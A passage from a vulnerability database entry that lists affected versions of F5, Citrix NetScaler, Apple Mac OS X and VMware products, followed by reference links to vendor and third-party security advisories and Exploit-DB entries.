                                                    F5>>Big-ip_application_acceleration_manager >> Version 11.6.0

                                                    F5>>Big-ip_application_security_manager >> Version From (including) 10.0.0 To (including) 10.2.4

                                                    F5>>Big-ip_application_security_manager >> Version From (including) 11.0.0 To (including) 11.5.1

                                                    F5>>Big-ip_application_security_manager >> Version 11.6.0

                                                    F5>>Big-ip_edge_gateway >> Version From (including) 10.1.0 To (including) 10.2.4

                                                    F5>>Big-ip_edge_gateway >> Version From (including) 11.0.0 To (including) 11.3.0

                                                    F5>>Big-ip_global_traffic_manager >> Version From (including) 10.0.0 To (including) 10.2.4

                                                    F5>>Big-ip_global_traffic_manager >> Version From (including) 11.0.0 To (including) 11.5.1

                                                    F5>>Big-ip_global_traffic_manager >> Version 11.6.0

                                                    F5>>Big-ip_link_controller >> Version From (including) 10.0.0 To (including) 10.2.4

                                                    F5>>Big-ip_link_controller >> Version From (including) 11.0.0 To (including) 11.5.1

                                                    F5>>Big-ip_link_controller >> Version 11.6.0

                                                    F5>>Big-ip_local_traffic_manager >> Version From (including) 10.0.0 To (including) 10.2.4

                                                    F5>>Big-ip_local_traffic_manager >> Version From (including) 11.0.0 To (including) 11.5.1

                                                    F5>>Big-ip_local_traffic_manager >> Version 11.6.0

                                                    F5>>Big-ip_policy_enforcement_manager >> Version From (including) 11.3.0 To (including) 11.5.1

                                                    F5>>Big-ip_policy_enforcement_manager >> Version 11.6.0

                                                    F5>>Big-ip_protocol_security_module >> Version From (including) 10.0.0 To (including) 10.2.4

                                                    F5>>Big-ip_protocol_security_module >> Version From (including) 11.0.0 To (including) 11.4.1

                                                    F5>>Big-ip_wan_optimization_manager >> Version From (including) 10.0.0 To (including) 10.2.4

                                                    F5>>Big-ip_wan_optimization_manager >> Version From (including) 11.0.0 To (including) 11.3.0

                                                    F5>>Big-ip_webaccelerator >> Version From (including) 10.0.0 To (including) 10.2.4

                                                    F5>>Big-ip_webaccelerator >> Version From (including) 11.0.0 To (including) 11.3.0

                                                    F5>>Big-iq_cloud >> Version From (including) 4.0.0 To (including) 4.4.0

                                                    F5>>Big-iq_device >> Version From (including) 4.2.0 To (including) 4.4.0

                                                    F5>>Big-iq_security >> Version From (including) 4.0.0 To (including) 4.4.0

                                                    F5>>Enterprise_manager >> Version From (including) 2.1.0 To (including) 2.3.0

                                                    F5>>Enterprise_manager >> Version From (including) 3.0.0 To (including) 3.1.1

                                                    F5>>Traffix_signaling_delivery_controller >> Version From (including) 4.0.0 To (including) 4.0.5

                                                    F5>>Traffix_signaling_delivery_controller >> Version 3.3.2

                                                    F5>>Traffix_signaling_delivery_controller >> Version 3.4.1

                                                    F5>>Traffix_signaling_delivery_controller >> Version 3.5.1

                                                    F5>>Traffix_signaling_delivery_controller >> Version 4.1.0

                                                    Configuraton 0

                                                    F5>>Arx_firmware >> Version From (including) 6.0.0 To (including) 6.4.0

                                                    F5>>Arx >> Version -

                                                    Configuraton 0

                                                    Citrix>>Netscaler_sdx_firmware >> Version To (excluding) 9.3.67.5r1

                                                      Citrix>>Netscaler_sdx_firmware >> Version From (including) 10 To (excluding) 10.1.129.11r1

                                                      Citrix>>Netscaler_sdx_firmware >> Version From (including) 10.5 To (excluding) 10.5.52.11r1

                                                        Citrix>>Netscaler_sdx >> Version -

                                                        Configuraton 0

                                                        Apple>>Mac_os_x >> Version From (including) 10.0.0 To (excluding) 10.10.0

                                                        Configuraton 0

                                                        Vmware>>Vcenter_server_appliance >> Version 5.0

                                                        Vmware>>Vcenter_server_appliance >> Version 5.0

                                                        Vmware>>Vcenter_server_appliance >> Version 5.0

                                                        Vmware>>Vcenter_server_appliance >> Version 5.1

                                                        Vmware>>Vcenter_server_appliance >> Version 5.1

                                                        Vmware>>Vcenter_server_appliance >> Version 5.1

                                                        Vmware>>Vcenter_server_appliance >> Version 5.5

                                                        Vmware>>Vcenter_server_appliance >> Version 5.5

                                                        Vmware>>Esx >> Version 4.0

                                                        Vmware>>Esx >> Version 4.1

                                                        Références

                                                        https://www.exploit-db.com/exploits/37816/
                                                        Tags : exploit, x_refsource_EXPLOIT-DB
                                                        http://marc.info/?l=bugtraq&m=141577137423233&w=2
                                                        Tags : vendor-advisory, x_refsource_HP
                                                        http://marc.info/?l=bugtraq&m=142719845423222&w=2
                                                        Tags : vendor-advisory, x_refsource_HP
                                                        https://www.exploit-db.com/exploits/39918/
                                                        Tags : exploit, x_refsource_EXPLOIT-DB
                                                        http://marc.info/?l=bugtraq&m=141216668515282&w=2
                                                        Tags : vendor-advisory, x_refsource_HP
                                                        http://rhn.redhat.com/errata/RHSA-2014-1295.html
                                                        Tags : vendor-advisory, x_refsource_REDHAT
                                                        http://marc.info/?l=bugtraq&m=141383138121313&w=2
                                                        Tags : vendor-advisory, x_refsource_HP
                                                        http://marc.info/?l=bugtraq&m=142721162228379&w=2
                                                        Tags : vendor-advisory, x_refsource_HP
                                                        http://marc.info/?l=bugtraq&m=142358026505815&w=2
                                                        Tags : vendor-advisory, x_refsource_HP
                                                        http://marc.info/?l=bugtraq&m=142719845423222&w=2
                                                        Tags : vendor-advisory, x_refsource_HP
                                                        http://secunia.com/advisories/61188
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://jvn.jp/en/jp/JVN55667175/index.html
                                                        Tags : third-party-advisory, x_refsource_JVN
                                                        http://secunia.com/advisories/61676
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        https://www.exploit-db.com/exploits/40619/
                                                        Tags : exploit, x_refsource_EXPLOIT-DB
                                                        http://secunia.com/advisories/60433
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        https://www.exploit-db.com/exploits/38849/
                                                        Tags : exploit, x_refsource_EXPLOIT-DB
                                                        http://marc.info/?l=bugtraq&m=141383026420882&w=2
                                                        Tags : vendor-advisory, x_refsource_HP
                                                        http://marc.info/?l=bugtraq&m=141585637922673&w=2
                                                        Tags : vendor-advisory, x_refsource_HP
                                                        http://marc.info/?l=bugtraq&m=141576728022234&w=2
                                                        Tags : vendor-advisory, x_refsource_HP
                                                        http://secunia.com/advisories/61715
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://secunia.com/advisories/61816
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://secunia.com/advisories/61442
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://marc.info/?l=bugtraq&m=142358078406056&w=2
                                                        Tags : vendor-advisory, x_refsource_HP
                                                        http://marc.info/?l=bugtraq&m=142805027510172&w=2
                                                        Tags : vendor-advisory, x_refsource_HP
                                                        http://secunia.com/advisories/61283
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://marc.info/?l=bugtraq&m=142113462216480&w=2
                                                        Tags : vendor-advisory, x_refsource_HP
                                                        http://www.ubuntu.com/usn/USN-2362-1
                                                        Tags : vendor-advisory, x_refsource_UBUNTU
                                                        http://secunia.com/advisories/61654
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://secunia.com/advisories/61542
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://secunia.com/advisories/62312
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://secunia.com/advisories/59272
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://marc.info/?l=bugtraq&m=141319209015420&w=2
                                                        Tags : vendor-advisory, x_refsource_HP
                                                        http://marc.info/?l=bugtraq&m=141879528318582&w=2
                                                        Tags : vendor-advisory, x_refsource_HP
                                                        http://marc.info/?l=bugtraq&m=142118135300698&w=2
                                                        Tags : vendor-advisory, x_refsource_HP
                                                        http://secunia.com/advisories/61703
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://support.apple.com/kb/HT6495
                                                        Tags : x_refsource_CONFIRM
                                                        http://www.kb.cert.org/vuls/id/252743
                                                        Tags : third-party-advisory, x_refsource_CERT-VN
                                                        http://secunia.com/advisories/61065
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://marc.info/?l=bugtraq&m=141383196021590&w=2
                                                        Tags : vendor-advisory, x_refsource_HP
                                                        http://marc.info/?l=bugtraq&m=141383081521087&w=2
                                                        Tags : vendor-advisory, x_refsource_HP
                                                        http://www.securityfocus.com/bid/70103
                                                        Tags : vdb-entry, x_refsource_BID
                                                        http://jvndb.jvn.jp/jvndb/JVNDB-2014-000126
                                                        Tags : third-party-advisory, x_refsource_JVNDB
                                                        http://marc.info/?l=bugtraq&m=141879528318582&w=2
                                                        Tags : vendor-advisory, x_refsource_HP
                                                        http://www.us-cert.gov/ncas/alerts/TA14-268A
                                                        Tags : third-party-advisory, x_refsource_CERT
                                                        http://secunia.com/advisories/61641
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        https://access.redhat.com/node/1200223
                                                        Tags : x_refsource_CONFIRM
                                                        http://seclists.org/fulldisclosure/2014/Oct/0
                                                        Tags : mailing-list, x_refsource_FULLDISC
                                                        http://www.mandriva.com/security/advisories?name=MDVSA-2015:164
                                                        Tags : vendor-advisory, x_refsource_MANDRIVA
                                                        http://rhn.redhat.com/errata/RHSA-2014-1293.html
                                                        Tags : vendor-advisory, x_refsource_REDHAT
                                                        http://marc.info/?l=bugtraq&m=142721162228379&w=2
                                                        Tags : vendor-advisory, x_refsource_HP
                                                        http://secunia.com/advisories/60325
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://secunia.com/advisories/60024
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        https://www.exploit-db.com/exploits/34879/
                                                        Tags : exploit, x_refsource_EXPLOIT-DB
                                                        http://secunia.com/advisories/62343
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://secunia.com/advisories/61565
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://marc.info/?l=bugtraq&m=141450491804793&w=2
                                                        Tags : vendor-advisory, x_refsource_HP
                                                        http://secunia.com/advisories/61313
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://marc.info/?l=bugtraq&m=142358026505815&w=2
                                                        Tags : vendor-advisory, x_refsource_HP
                                                        http://secunia.com/advisories/61873
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://secunia.com/advisories/61485
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://secunia.com/advisories/60947
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        https://support.apple.com/kb/HT6535
                                                        Tags : x_refsource_CONFIRM
                                                        http://marc.info/?l=bugtraq&m=141577297623641&w=2
                                                        Tags : vendor-advisory, x_refsource_HP
                                                        http://marc.info/?l=bugtraq&m=142546741516006&w=2
                                                        Tags : vendor-advisory, x_refsource_HP
                                                        http://marc.info/?l=bugtraq&m=141383244821813&w=2
                                                        Tags : vendor-advisory, x_refsource_HP
                                                        http://secunia.com/advisories/61312
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://secunia.com/advisories/60193
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://secunia.com/advisories/60063
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://secunia.com/advisories/60034
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://marc.info/?l=bugtraq&m=141330425327438&w=2
                                                        Tags : vendor-advisory, x_refsource_HP
                                                        http://secunia.com/advisories/59907
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://secunia.com/advisories/58200
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://marc.info/?l=bugtraq&m=141577241923505&w=2
                                                        Tags : vendor-advisory, x_refsource_HP
                                                        http://secunia.com/advisories/61643
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://secunia.com/advisories/61503
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://rhn.redhat.com/errata/RHSA-2014-1354.html
                                                        Tags : vendor-advisory, x_refsource_REDHAT
                                                        https://www.exploit-db.com/exploits/40938/
                                                        Tags : exploit, x_refsource_EXPLOIT-DB
                                                        http://marc.info/?l=bugtraq&m=141216207813411&w=2
                                                        Tags : vendor-advisory, x_refsource_HP
                                                        http://secunia.com/advisories/61547
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://marc.info/?l=bugtraq&m=141383465822787&w=2
                                                        Tags : vendor-advisory, x_refsource_HP
                                                        http://marc.info/?l=bugtraq&m=141694386919794&w=2
                                                        Tags : vendor-advisory, x_refsource_HP
                                                        http://secunia.com/advisories/61552
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://secunia.com/advisories/61780
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://www.debian.org/security/2014/dsa-3032
                                                        Tags : vendor-advisory, x_refsource_DEBIAN
                                                        http://secunia.com/advisories/62228
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://marc.info/?l=bugtraq&m=141330468527613&w=2
                                                        Tags : vendor-advisory, x_refsource_HP
                                                        http://secunia.com/advisories/61855
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://marc.info/?l=bugtraq&m=141235957116749&w=2
                                                        Tags : vendor-advisory, x_refsource_HP
                                                        http://secunia.com/advisories/60044
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://secunia.com/advisories/61291
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://rhn.redhat.com/errata/RHSA-2014-1294.html
                                                        Tags : vendor-advisory, x_refsource_REDHAT
                                                        http://marc.info/?l=bugtraq&m=141345648114150&w=2
                                                        Tags : vendor-advisory, x_refsource_HP
                                                        http://secunia.com/advisories/59737
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://secunia.com/advisories/61287
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://marc.info/?l=bugtraq&m=141383353622268&w=2
                                                        Tags : vendor-advisory, x_refsource_HP
                                                        http://marc.info/?l=bugtraq&m=142118135300698&w=2
                                                        Tags : vendor-advisory, x_refsource_HP
                                                        http://marc.info/?l=bugtraq&m=142118135300698&w=2
                                                        Tags : vendor-advisory, x_refsource_HP
                                                        http://secunia.com/advisories/61711
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://marc.info/?l=bugtraq&m=142113462216480&w=2
                                                        Tags : vendor-advisory, x_refsource_HP
                                                        http://marc.info/?l=bugtraq&m=141383304022067&w=2
                                                        Tags : vendor-advisory, x_refsource_HP
                                                        http://secunia.com/advisories/61128
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://secunia.com/advisories/61471
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://secunia.com/advisories/60055
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://secunia.com/advisories/61550
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://secunia.com/advisories/61633
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://secunia.com/advisories/61328
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        https://www.exploit-db.com/exploits/42938/
                                                        Tags : exploit, x_refsource_EXPLOIT-DB
                                                        http://secunia.com/advisories/61129
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://secunia.com/advisories/61700
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://secunia.com/advisories/61603
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://secunia.com/advisories/61857
                                                        Tags : third-party-advisory, x_refsource_SECUNIA